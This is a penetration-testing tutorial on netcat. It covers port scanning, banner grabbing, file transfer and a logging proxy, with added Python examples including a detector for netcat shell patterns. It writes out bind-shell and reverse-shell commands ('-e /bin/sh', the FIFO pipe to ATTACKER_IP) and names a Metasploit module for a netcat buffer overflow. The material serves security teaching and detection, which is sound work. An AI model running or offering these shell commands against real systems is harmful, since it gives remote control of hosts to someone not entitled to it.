Introduction: If you are a penetration tester, netcat is probably one of your most-used tools. For over 20 years this tiny but powerful utility has been used by hackers for a wide range of activities, and it is so versatile that many people in the security community refer to it as the “Swiss Army knife of hacking tools.” It is used by black hats and white hats alike.
Netcat was designed as a network analysis tool. Its author, known only by the handle “Hobbit,” gave it to the IT community without compensation and has received scores of accolades for it. Salute to Hobbit!
Originally written for UNIX and, for a long stretch, not actively maintained, Netcat has since been rewritten in a number of versions and implementations. It has been ported to many operating systems, but is most often seen on Linux distributions and on Microsoft Windows.
Download and install netcat:
On Windows, netcat can be downloaded from:
On Ubuntu and other Debian-based distributions, two packages are available: netcat-openbsd (the default nc, which does not have the -e option) and netcat-traditional (which keeps -e). Install both of them:
$ sudo apt-get install netcat-traditional netcat-openbsd
In the picture above, the help output on the left is from the Linux build and the one on the right from the Windows build.
To demonstrate further, two machines are used:
- Windows XP SP2 [192.168.0.104]
- Linux Mint [192.168.0.106]
Port Opening: To open (listen on) a particular port, netcat has a simple command:
nc -l -p PORT
here -l puts netcat into listen mode and -p gives the local port number to open; the screenshot uses port 4444.
In the image above, the netstat output shows that nc is listening on port 4444.
Port Scanning: An example is:
nc -v -w 2 -z TARGET 135 445
Netcat will try connecting to ports 135 and 445 on the target. The -z switch prevents sending any data over a TCP connection (and sends only very limited probe data over UDP), which makes it a fast scanning mode just to see which ports the target is listening on. -v prints the result of each attempt and -w 2 gives up on a connection after two seconds. To slow the scan down, -i inserts a delay between port probes.
Banner Grabbing: Banner grabbing is an enumeration technique, which is designed to determine the brand, version, operating system, or other relevant information about a particular service or application. This is especially important if you are looking for a vulnerability associated with a particular version of some service.
The syntax of a banner grab is not unlike the standard Netcat command line: run Netcat in client mode, give the hostname, and then the port number of the service. Some services (SSH, FTP, SMTP) announce themselves as soon as you connect; others, such as HTTP, only answer once you have typed a request.
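As an added example (not code from the original article), here is the same connect scan and banner grab done with raw sockets in Python, which makes explicit what netcat does for you: -z completes the TCP handshake and sends nothing, while a banner grab connects, optionally sends a protocol probe, and reads whatever comes back. The fake HTTP service, its Server header, and the function names are constructed for the demo; nothing outside loopback is touched.

```python
"""Connect scan and banner grab done by hand, to show what netcat does for you.
Added example; the fake HTTP service below is constructed for the demo."""
import socket
import threading


def scan_ports(host, ports, timeout=2.0):
    """Equivalent of `nc -v -w 2 -z HOST PORTS`: complete the TCP handshake,
    send nothing, close. Returns the ports that accepted the connection."""
    open_ports = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append(port)
        except OSError:          # refused, timed out, unreachable: treat as closed
            pass
    return open_ports


def grab_banner(host, port, probe=b"", timeout=2.0, limit=4096):
    """Connect in client mode, optionally send a protocol probe (HTTP needs one,
    SSH/FTP/SMTP talk first), and return what the service says until it closes
    the connection, goes quiet for `timeout` seconds, or `limit` bytes arrive."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            while sum(len(c) for c in chunks) < limit:
                data = s.recv(limit)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


def parse_server_header(banner):
    """Extract the Server: value from an HTTP response banner, or None."""
    head = banner.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"server":
            return value.strip().decode("latin-1")
    return None


def _fake_http_service(listener, banner):
    """Constructed stand-in for a web server: reads the request, answers with a
    fixed banner, and keeps serving connections until the listener is closed."""
    try:
        while True:
            conn, _ = listener.accept()
            with conn:
                try:
                    conn.recv(1024)
                    conn.sendall(banner)
                except OSError:   # the -z style connection closed without talking
                    pass
    except OSError:
        return  # listener closed by demo()


def demo():
    """Constructed lab on loopback: one fake HTTP service plus a port known to be closed."""
    fake_banner = (b"HTTP/1.0 200 OK\r\n"
                   b"Server: Apache/2.4.41 (Ubuntu)\r\n"
                   b"Content-Length: 0\r\n\r\n")
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    open_port = srv.getsockname()[1]
    tmp = socket.socket()                 # grab a free port, then release it so it is closed
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()
    threading.Thread(target=_fake_http_service, args=(srv, fake_banner), daemon=True).start()

    found = scan_ports("127.0.0.1", [closed_port, open_port])
    banner = grab_banner("127.0.0.1", open_port, probe=b"HEAD / HTTP/1.0\r\n\r\n")
    srv.close()
    return {"open_port": open_port, "closed_port": closed_port,
            "open_ports": found, "banner": banner,
            "server": parse_server_header(banner)}


if __name__ == "__main__":
    result = demo()
    print("open:", result["open_ports"], "closed:", result["closed_port"])
    print("server header:", result["server"])
```

The closed port is obtained by binding an ephemeral port and releasing it, so the refusal is immediate; against a real host a filtered port shows up as the -w timeout instead, which is why the scan is slow without -w and why nmap is the better tool once you need more than a handful of ports.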
File Transfer: One common use for Netcat is for transferring files. Netcat has the ability to both pull and push files.
Consider the following example:
nc -l -p 12345 < textfile
In this case, Netcat is started in server mode on local port 12345, and is offering textfile.
A client who connects to this server pulls the file from it and receives textfile:
nc SOURCE_IP 12345 > textfile
Netcat provides neither an integrity check nor encryption: the file crosses the network in the clear, and a dropped connection leaves a truncated copy with no error you can trust, so compare a checksum (sha256sum on both ends) after the transfer.
Chat Interface: At heart, Netcat is a networking program that reads and writes data across connections. Perhaps the easiest way to see how this works is to set up a server and a client. In one terminal window, start the server:
nc -l -p PORT
On a second machine, connect to the server with the client:
nc SERVER SERVER_PORT
The result is a very elementary chat interface. Text entered on one side of the connection is sent to the other side when you hit enter. Notice that nothing indicates the source of the text; only the received output is printed, and it travels over the wire in the clear.
Proxy Server: It is possible to use netcat to create a TCP proxy and monitor the traffic passing through it. The following two commands set one up (the redirection characters are essential and are easily lost when copying; TARGET is the host you forward to):
$ mknod backpipe p
$ nc -l -p 80 0<backpipe | tee -a incoming.txt | nc TARGET 8080 | tee -a outgoing.txt 1>backpipe
This listens on local port 80 and forwards the connection to port 8080 on TARGET. Whatever the client sends is appended to incoming.txt on its way out, and the service's replies are appended to outgoing.txt on their way back. The named pipe is what makes the connection bi-directional: the second nc's output has nowhere to go but tee and the pipe, and the pipe feeds it back into the first nc's standard input, which is what the client receives. Like any plain nc -l, this serves a single connection and exits when the client disconnects, so wrap it in a loop if you need more.
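The same proxy as an added Python example (not the article's code) makes the data flow explicit: one thread copies client bytes to the remote service and appends them to incoming.txt, a second copies the replies back and appends them to outgoing.txt, which is exactly the two directions the named pipe provides in the netcat version. The upper-casing echo service standing in for the port 8080 target, the ephemeral ports and the log file locations are constructed for the demo.

```python
"""Logging TCP relay: the netcat + named-pipe proxy, reimplemented with sockets.
Added example; the upper-casing service stands in for the real target on 8080."""
import os
import shutil
import socket
import tempfile
import threading


def _pump(src, dst, log_path):
    """Copy bytes from src to dst until src hits EOF, appending every chunk to
    log_path (the job `tee -a` does in the netcat version). Then half-close dst
    so the far end sees the EOF too."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            with open(log_path, "ab") as log:
                log.write(chunk)
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_once(listener, target, incoming_log, outgoing_log):
    """Accept one client on `listener`, connect to `target`, and shuttle both
    directions: client->target bytes go to incoming_log, target->client bytes
    to outgoing_log. Like plain `nc -l`, it serves a single connection."""
    client, _ = listener.accept()
    upstream = socket.create_connection(target)
    threads = [
        threading.Thread(target=_pump, args=(client, upstream, incoming_log)),
        threading.Thread(target=_pump, args=(upstream, client, outgoing_log)),
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    client.close()
    upstream.close()


def _upper_echo_service(listener):
    """Constructed stand-in for the real service on port 8080: echoes its input
    in upper case, so the two log files are easy to tell apart."""
    conn, _ = listener.accept()
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            conn.sendall(data.upper())


def demo(payload=b"GET / HTTP/1.0\r\n\r\n"):
    """Run the proxy on loopback with ephemeral ports; return what the client
    got back and the contents of both log files."""
    backend = socket.socket()
    backend.bind(("127.0.0.1", 0))
    backend.listen(1)
    front = socket.socket()
    front.bind(("127.0.0.1", 0))
    front.listen(1)
    workdir = tempfile.mkdtemp()
    incoming = os.path.join(workdir, "incoming.txt")
    outgoing = os.path.join(workdir, "outgoing.txt")
    for path in (incoming, outgoing):     # same effect as tee -a on a fresh file
        open(path, "ab").close()

    threading.Thread(target=_upper_echo_service, args=(backend,), daemon=True).start()
    proxy = threading.Thread(target=relay_once,
                             args=(front, backend.getsockname(), incoming, outgoing))
    proxy.start()

    with socket.create_connection(front.getsockname()) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)        # done talking; wait for the reply and EOF
        reply = b""
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            reply += chunk
    proxy.join()
    front.close()
    backend.close()
    with open(incoming, "rb") as f:
        seen_in = f.read()
    with open(outgoing, "rb") as f:
        seen_out = f.read()
    shutil.rmtree(workdir)
    return reply, seen_in, seen_out


if __name__ == "__main__":
    reply, seen_in, seen_out = demo()
    print("client received:", reply)
    print("incoming.txt   :", seen_in)
    print("outgoing.txt   :", seen_out)
```

The half-close in `_pump` is the detail that trips people up with the named-pipe version too: each direction has to propagate its EOF independently, or one side hangs waiting for a reply that has already been sent.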
Backdoor / Bind Shell: To leave a backdoor on a victim's system, netcat is one of the most reliable choices. Netcat comes with an option, -e, which runs a program and attaches its input and output to the connection as soon as a remote user connects to the listening port.
A bind shell is only useful to an attacker when the victim's listening port can be reached from where the attacker sits, for example a host directly exposed to the internet; a firewall or NAT in front of the victim blocks the inbound connection.
If victim’s system is windows:
nc -l -p PORT -e cmd.exe
If victim’s system is linux:
nc -l -p PORT -e /bin/sh
In either case, on the attacker machine:
nc VICTIM_IP VICTIM_PORT
Backdoor without ‘-e’: For security reasons, many Linux distributions ship a netcat built without the -e option (netcat-openbsd is one example) so that it cannot be used directly to spawn a shell. In that scenario, the following two lines on the victim's Linux system give us the same backdoor:
$ mknod /tmp/backpipe p
$ /bin/sh 0</tmp/backpipe | nc ATTACKER_IP ATTACKER_PORT 1>/tmp/backpipe
Here, we first make a named pipe (also called a FIFO) called backpipe using the mknod command. mknod lets us create special files in the file system, and here we create something called “backpipe” of type “p”, which is a named pipe. Alternatively, we could have used the mkfifo command available on most Linux and Unix variants, leaving off the p argument. This FIFO will be used to shuttle data back to our shell's input. We create the backpipe in /tmp because pretty much any account is allowed to write there.
Then we invoke a shell (/bin/sh), the most common shell available on all kinds of Linux and Unix systems, pulling its standard input from the backpipe (0</tmp/backpipe). On most shells you can dispense with the 0 and write just <, since < alone means standard input, but we have seen odd shells where it doesn't work unless you use the 0, so we always put it in. The shell's output is piped into nc, which connects back to the attacker, and nc's own output (whatever the attacker types) is written into the backpipe (1>/tmp/backpipe), where the shell reads it as its next command.
In this case the attacker's listener must be running first; on the attacker machine:
nc -l -p ATTACKER_PORT
Reverse Shell: A very popular use of Netcat, and probably the most common one from a penetration-testing perspective, is reverse and bind shells. A reverse shell is a shell initiated from the target host back to the attack box, which is listening to pick up the connection.
Here the attacker machine is Windows XP SP2 and the victim is Linux Mint. The attacker opens port 6667 and runs the reverse shell command on the victim's system; as a result the Windows XP box controls Linux Mint through the reverse shell. A reverse shell is the better option when the victim is behind a firewall or NAT or inside an intranet, because the connection is made outbound from the victim, which is far more likely to be allowed than an inbound one.
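From the defender's side, an added example (not part of the original article) that classifies recorded command lines into the three patterns shown above: a -e bind shell, a -e reverse shell, and the -e-less FIFO trick. Python is used here because the logic is a parser, not something you would type at a netcat prompt. The sample lines, the binary and shell name lists, and the label names are constructed for the demo; ncat's --exec/--sh-exec and netcat-traditional's -c are treated as equivalents of -e.

```python
"""Spotting netcat shells in recorded command lines (shell history, auditd
EXECVE records, EDR process telemetry). Added example with constructed data.
Patterns covered: -e bind shell, -e reverse shell, and the -e-less FIFO trick."""
import re
import shlex

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd", "nc.exe"}
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh", "cmd", "cmd.exe", "powershell.exe"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}   # -c/--sh-exec: "run via a shell" variants
REDIRECT = re.compile(r"^\d*(<|>>|>)(\S+)$")        # 0</tmp/p, 1>/tmp/p, >>log


def _basename(token):
    return re.split(r"[\\/]", token)[-1].lower()


def _is_netcat(argv):
    return bool(argv) and _basename(argv[0]) in NETCAT_NAMES


def _listens(argv):
    """True if a listen flag is present. -l may be bundled (-lvp, -nlvp) and
    the Windows build also has -L ("listen harder")."""
    for arg in argv[1:]:
        if arg == "--listen":
            return True
        if arg.startswith("-") and not arg.startswith("--") and "l" in arg[1:].lower():
            return True
    return False


def _execs(argv):
    return any(a.split("=", 1)[0] in EXEC_FLAGS for a in argv[1:])


def _redirected_files(argv, direction):
    """Paths used as stdin ('<') or stdout ('>') redirections in one pipeline stage."""
    paths = set()
    for arg in argv:
        m = REDIRECT.match(arg)
        if m and m.group(1).startswith(direction):
            paths.add(m.group(2))
    return paths


def classify(cmdline):
    """Return 'bind_shell', 'reverse_shell', 'fifo_bind_shell',
    'fifo_reverse_shell', or None for a single recorded command line."""
    try:
        stages = [shlex.split(part) for part in cmdline.split("|")]
    except ValueError:               # unbalanced quotes: nothing we can parse
        return None
    nc_stages = [s for s in stages if _is_netcat(s)]
    if not nc_stages:
        return None
    nc = nc_stages[0]
    direction = "bind" if _listens(nc) else "reverse"
    if _execs(nc):
        return f"{direction}_shell"
    # -e-less variant: a shell reads stdin from a FIFO that netcat writes its
    # stdout to, while the shell's stdout is piped into netcat.
    shell_stages = [s for s in stages if s and _basename(s[0]) in SHELL_NAMES]
    shell_inputs = set().union(*[_redirected_files(s, "<") for s in shell_stages])
    nc_outputs = _redirected_files(nc, ">")
    if shell_inputs & nc_outputs:
        return f"fifo_{direction}_shell"
    return None


def scan(lines):
    """Run classify() over many lines; return (label, line) for every hit."""
    hits = []
    for line in lines:
        label = classify(line.strip())
        if label:
            hits.append((label, line.strip()))
    return hits


# Constructed sample: benign netcat use from this article mixed with the shell patterns.
SAMPLE_LINES = [
    "nc -v -w 2 -z 192.168.0.104 135 445",
    "nc -l -p 12345 < textfile",
    "nc -l -p 4444 -e /bin/sh",
    "nc.exe -Lp 31337 -e cmd.exe",
    "nc 192.168.0.104 6667 -e /bin/bash",
    "ncat --exec /bin/bash 192.168.0.104 443",
    "mknod /tmp/backpipe p",
    "/bin/sh 0</tmp/backpipe | nc 192.168.0.104 6667 1>/tmp/backpipe",
    "tar czf - /var/log | nc 192.168.0.104 9999",
]

if __name__ == "__main__":
    for label, line in scan(SAMPLE_LINES):
        print(f"{label:20s} {line}")
```

The FIFO pattern is only visible when the whole pipeline is recorded (shell history, an auditd rule on the shell's execve, or EDR command-line capture). In a plain process listing the same attack appears as a separate `/bin/sh` and `nc HOST PORT` with no redirections in argv, so there you correlate differently: look for a netcat process whose stdout in /proc/PID/fd is a FIFO, and for mknod/mkfifo executions in /tmp shortly before it.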
Vulnerability within NetCat:
YES!!! You read it right. The Windows build of Netcat 1.10 has a stack-based buffer overflow in doexec.c: when nc is running with the -e option, a remote attacker can execute arbitrary code via a long DNS command. The CVE id is CVE-2004-1317, and it covers the Windows build only.
To exploit this issue Metasploit has its own module: exploit/windows/misc/netcat110_nt
On the victim machine (192.168.0.104), start a vulnerable listener:
nc -Lp 31337 -e ftp
here ftp is just an example of a program to attach with -e; any other application would do. -L is the Windows build's “listen harder” mode, which keeps listening after a client disconnects, so the listener survives a failed attempt.
On the attacker machine:
Netcat is open source and popular, and has been modified by many developers, who produced variants with different names and extra features. Here are some cousins of netcat:
- Ncat: Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat works with IPv4 and IPv6 and offers a virtually limitless number of potential uses. It is integrated with Nmap and is available in the standard Nmap download packages (including source code and Linux, Windows, and Mac binaries) from the Nmap download page.
- Socat: A utility similar to the old netcat that works over a number of protocols and through files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6, raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.
- Cryptcat: one of the major problems with netcat is that everything it sends is in clear text. Cryptcat is the standard netcat enhanced with Twofish encryption, with ports for Windows NT, BSD and Linux (the Twofish code is courtesy of Counterpane and Cryptix). It reads and writes data across network connections using TCP or UDP while encrypting the data in transit, and like netcat it is designed to be a reliable back-end tool that can be used directly or driven by other programs and scripts, as well as a feature-rich network debugging and exploration tool. The encryption key is a pre-shared secret given with -k; it defaults to a well-known value, so always supply your own.
- Powercat: Powercat is a PowerShell version of netcat. It brings the functionality of Netcat to all recent versions of Microsoft Windows using native PowerShell version 2 components, which makes it easy to deploy and, according to its authors, less likely to be caught by traditional antivirus solutions than a dropped nc.exe. Recent versions of Powercat also include functionality that goes well beyond traditional forms of Netcat.
- Pnetcat: pnetcat is a Python reimplementation of the basic idea of the netcat program. It’s fast because it relies on large block sizes and TCP windows. It can read from a file or socket, and can write to a file or socket, in any combination you like.
Conclusion: In this article I wanted to cover as much information about netcat as possible, from its history to the present. It is an essential tool for every pen-tester. After reading it, you should understand netcat's various functions, the security issue in the Windows build of v1.10, and the netcat-like tools that are available. Hope you like it; comment below.